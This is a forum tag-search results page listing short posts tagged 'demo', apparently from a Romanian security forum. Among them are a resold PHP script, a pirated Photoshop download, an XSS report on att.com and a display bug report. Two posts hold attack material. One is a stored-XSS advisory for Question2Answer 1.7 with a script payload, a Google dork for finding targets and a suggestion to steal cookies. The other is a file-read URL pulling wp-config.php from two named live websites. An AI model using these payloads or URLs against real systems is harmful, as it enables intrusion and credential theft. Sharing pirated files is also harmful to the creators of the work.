Search the Community
Showing results for tags 'demo'.
-
vand scriptul php pentru un un social network gen facebook :PHP Scripts - Elitenetwork - Advanced Social Network Script | CodeCanyon aici aveti demo il dau la jumatate de pret
-
Vuln.: [XSS] [Cross Site Scripting]: *.att.com Demo ^ Poc : Status: Raportat
-
Demo : Wavelength Photoshop Action | GraphicRiver Download : Graphicriver Wavelength Photoshop Action 11163381.rar - Send Files Online - TempSend.com
-
###################################################################### [+] Title: Script Question2Answer 1.7 - Stored XSS Vulnerability [+] Author: s0w [+] Tested On Windows & Linux [+] Date: 21/03/2015 [+] Type: Web Application [+] Script Download: https://github.com/q2a/question2answer [+] Vendor Homepage: Question2Answer - Free Open Source Q&A Software for PHP [+] Vulnerability in:\qa-include\pages\question.php [+] Google Dork : intext:"Powered by Question2Answer" ####################################################################### [+] As shown in the code, the value of 'title' and 'textbody' not filtered by 'htmlspecialcharts' which cause stored xss and same in data-store in webserver SQL commands . [+] Exploit : 1. Browse application in browser .. 2. Add new question with xss code like alert method 3. submit the new question to viewers .. 4. complete next steps as xss in tag,body,title,.. etc .. 5. Finally submit your Qes .. 6. Test your target in main page ./index.php .. 7. Use this in Cookies,alerts, Or TrafficBots Have Fun !! [+] XSS Pattern can be used: '"<script>alert(/s0w/)</script> [+] Demo Video : Script Question2Answer - Stored XSS Vulnerability - YouTube [+] Demo Target : ???? ????? # Discovered By: s0w # Contact: fb.me/s0w.egy # Mail: s0wxp0c@gmail.com ?#? Greetz? To Egyptian Shell team | Sec4ever ?# Source:http://dl.packetstormsecurity.net/1503-exploits/question2answer-xss.txt
-
POC: http://localhost/?sd_action=demo&file=wp-config.php DEMO: hXXP://satoriwheels.org/?sd_action=demo&file=wp-config.php hXXP://skyhighrank.com/?sd_action=demo&file=wp-config.php Sursa
-
Dupa ce am dat like unui post am observat ca "design-ul" se cam duce. Demo: Link //Edit: De fapt chestia asta se intampla nu numai dupa ce dai like ci si dupa ce editezi un post sau chiar pur si simplu daca vizitezi un post . Link @Nytro